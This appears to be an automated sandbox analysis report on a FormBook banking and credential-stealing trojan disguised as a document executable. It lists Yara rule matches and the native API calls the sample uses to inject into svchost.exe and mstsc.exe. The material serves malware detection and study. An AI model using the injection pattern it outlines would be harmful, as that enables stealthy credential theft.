            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0077F5D0

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007129C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_007129C2
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007802AA NtdllDialogWndProc_W,0_2_007802AA
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077E769 NtdllDialogWndProc_W,CallWindowProcW,0_2_0077E769
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077EA4E NtdllDialogWndProc_W,0_2_0077EA4E
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0077ECBC
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072AC99 NtdllDialogWndProc_W,0_2_0072AC99
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,0_2_0072AD5C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072AFB4 GetParent,NtdllDialogWndProc_W,0_2_0072AFB4
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_0077EFA8
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F0A1 SendMessageW,NtdllDialogWndProc_W,0_2_0077F0A1
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0077F122
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F37C NtdllDialogWndProc_W,0_2_0077F37C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F3DA NtdllDialogWndProc_W,0_2_0077F3DA
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F3AB NtdllDialogWndProc_W,0_2_0077F3AB
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F45A ClientToScreen,NtdllDialogWndProc_W,0_2_0077F45A
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F425 NtdllDialogWndProc_W,0_2_0077F425
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0077F5D0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F594 GetWindowLongW,NtdllDialogWndProc_W,0_2_0077F594
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072B7F2 NtdllDialogWndProc_W,0_2_0072B7F2
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072B845 NtdllDialogWndProc_W,0_2_0072B845
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077FE80 NtdllDialogWndProc_W,0_2_0077FE80
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,0_2_0077FF04
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_0077FF91
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C553 NtClose,1_2_0042C553
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372B60 NtClose,LdrInitializeThunk,1_2_03372B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03372DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033735C0 NtCreateMutant,LdrInitializeThunk,1_2_033735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03374340 NtSetContextThread,1_2_03374340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03374650 NtSuspendThread,1_2_03374650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BA0 NtEnumerateValueKey,1_2_03372BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372B80 NtQueryInformationFile,1_2_03372B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BF0 NtAllocateVirtualMemory,1_2_03372BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BE0 NtQueryValueKey,1_2_03372BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AB0 NtWaitForSingleObject,1_2_03372AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AF0 NtWriteFile,1_2_03372AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AD0 NtReadFile,1_2_03372AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F30 NtCreateSection,1_2_03372F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F60 NtCreateProcessEx,1_2_03372F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FB0 NtResumeThread,1_2_03372FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FA0 NtQuerySection,1_2_03372FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F90 NtProtectVirtualMemory,1_2_03372F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FE0 NtCreateFile,1_2_03372FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372E30 NtWriteVirtualMemory,1_2_03372E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372EA0 NtAdjustPrivilegesToken,1_2_03372EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372E80 NtReadVirtualMemory,1_2_03372E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372EE0 NtQueueApcThread,1_2_03372EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D30 NtUnmapViewOfSection,1_2_03372D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D10 NtMapViewOfSection,1_2_03372D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D00 NtSetInformationFile,1_2_03372D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DB0 NtEnumerateKey,1_2_03372DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DD0 NtDelayExecution,1_2_03372DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C00 NtQueryInformationProcess,1_2_03372C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C70 NtFreeVirtualMemory,1_2_03372C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C60 NtCreateKey,1_2_03372C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CA0 NtQueryInformationToken,1_2_03372CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CF0 NtOpenProcess,1_2_03372CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CC0 NtQueryVirtualMemory,1_2_03372CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373010 NtOpenDirectoryObject,1_2_03373010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373090 NtSetValueKey,1_2_03373090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033739B0 NtGetContextThread,1_2_033739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373D10 NtOpenProcessToken,1_2_03373D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373D70 NtOpenThread,1_2_03373D70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04594650 NtSuspendThread,LdrInitializeThunk,3_2_04594650
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04594340 NtSetContextThread,LdrInitializeThunk,3_2_04594340
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04592C70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592C60 NtCreateKey,LdrInitializeThunk,3_2_04592C60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04592CA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04592D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04592D30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592DD0 NtDelayExecution,LdrInitializeThunk,3_2_04592DD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04592DF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04592EE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_04592E80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592F30 NtCreateSection,LdrInitializeThunk,3_2_04592F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592FE0 NtCreateFile,LdrInitializeThunk,3_2_04592FE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592FB0 NtResumeThread,LdrInitializeThunk,3_2_04592FB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592AD0 NtReadFile,LdrInitializeThunk,3_2_04592AD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592AF0 NtWriteFile,LdrInitializeThunk,3_2_04592AF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592B60 NtClose,LdrInitializeThunk,3_2_04592B60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04592BF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04592BE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04592BA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045935C0 NtCreateMutant,LdrInitializeThunk,3_2_045935C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045939B0 NtGetContextThread,LdrInitializeThunk,3_2_045939B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592C00 NtQueryInformationProcess,3_2_04592C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592CC0 NtQueryVirtualMemory,3_2_04592CC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592CF0 NtOpenProcess,3_2_04592CF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592D00 NtSetInformationFile,3_2_04592D00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592DB0 NtEnumerateKey,3_2_04592DB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592E30 NtWriteVirtualMemory,3_2_04592E30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592EA0 NtAdjustPrivilegesToken,3_2_04592EA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592F60 NtCreateProcessEx,3_2_04592F60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592F90 NtProtectVirtualMemory,3_2_04592F90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592FA0 NtQuerySection,3_2_04592FA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592AB0 NtWaitForSingleObject,3_2_04592AB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04592B80 NtQueryInformationFile,3_2_04592B80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04593010 NtOpenDirectoryObject,3_2_04593010
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04593090 NtSetValueKey,3_2_04593090
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04593D70 NtOpenThread,3_2_04593D70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04593D10 NtOpenProcessToken,3_2_04593D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_02668EE0 NtCreateFile,3_2_02668EE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_02669330 NtAllocateVirtualMemory,3_2_02669330
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_02669040 NtReadFile,3_2_02669040
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_02669130 NtDeleteFile,3_2_02669130
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_026691D0 NtClose,3_2_026691D0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075702F: CreateFileW,DeviceIoControl,CloseHandle,0_2_0075702F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0074B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74775590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_0074B9F1
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007582D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007582D0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0073BDF60_2_0073BDF6
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0071A0C00_2_0071A0C0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007301830_2_00730183
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075220C0_2_0075220C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007185300_2_00718530
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007166700_2_00716670
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007306770_2_00730677
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007487790_2_00748779
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077A8DC0_2_0077A8DC
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00730A8F0_2_00730A8F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00716BBC0_2_00716BBC
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00718CA00_2_00718CA0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0073AC830_2_0073AC83
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0072AD5C0_2_0072AD5C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00730EC40_2_00730EC4
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00744EBF0_2_00744EBF
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007730AD0_2_007730AD
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0074113E0_2_0074113E
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007312F90_2_007312F9
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0074542F0_2_0074542F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0077F5D00_2_0077F5D0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_007236800_2_00723680
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0074599F0_2_0074599F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0073DA740_2_0073DA74
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0071DCD00_2_0071DCD0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00715D320_2_00715D32
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0071BDF00_2_0071BDF0
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00731E5A0_2_00731E5A
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0073DF690_2_0073DF69
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00747FFD0_2_00747FFD
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0075BFB80_2_0075BFB8
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_04D736200_2_04D73620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004185631_2_00418563
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100231_2_00410023
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E0A31_2_0040E0A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031091_2_00403109
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031101_2_00403110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EB331_2_0042EB33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FDFC1_2_0040FDFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026701_2_00402670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE031_2_0040FE03
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167431_2_00416743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA3521_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034003E61_2_034003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F01_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E02741_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C02C01_2_033C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA1181_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033301001_2_03330100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C81581_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F41A21_2_033F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034001AA1_2_034001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F81CC1_2_033F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D20001_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033407701_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033647501_2_03364750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333C7C01_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335C6E01_2_0335C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033405351_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034005911_2_03400591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E44201_2_033E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F24461_2_033F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EE4F61_2_033EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FAB401_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F6BD71_2_033F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA801_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033569621_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A01_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340A9A61_2_0340A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334A8401_2_0334A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033428401_2_03342840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033268B81_2_033268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E8F01_2_0336E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360F301_2_03360F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E2F301_2_033E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03382F281_2_03382F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4F401_2_033B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BEFA01_2_033BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332FC81_2_03332FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FEE261_2_033FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340E591_2_03340E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352E901_2_03352E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FCE931_2_033FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FEEDB1_2_033FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DCD1F1_2_033DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334AD001_2_0334AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03358DBF1_2_03358DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333ADE01_2_0333ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340C001_2_03340C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0CB51_2_033E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330CF21_2_03330CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F132D1_2_033F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332D34C1_2_0332D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0338739A1_2_0338739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033452A01_2_033452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335D2F01_2_0335D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E12ED1_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335B2C01_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340B16B1_2_0340B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332F1721_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337516C1_2_0337516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334B1B01_2_0334B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F70E91_2_033F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FF0E01_2_033FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EF0CC1_2_033EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033470C01_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FF7B01_2_033FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033856301_2_03385630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F16CC1_2_033F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DD5B01_2_033DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FF43F1_2_033FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033314601_2_03331460
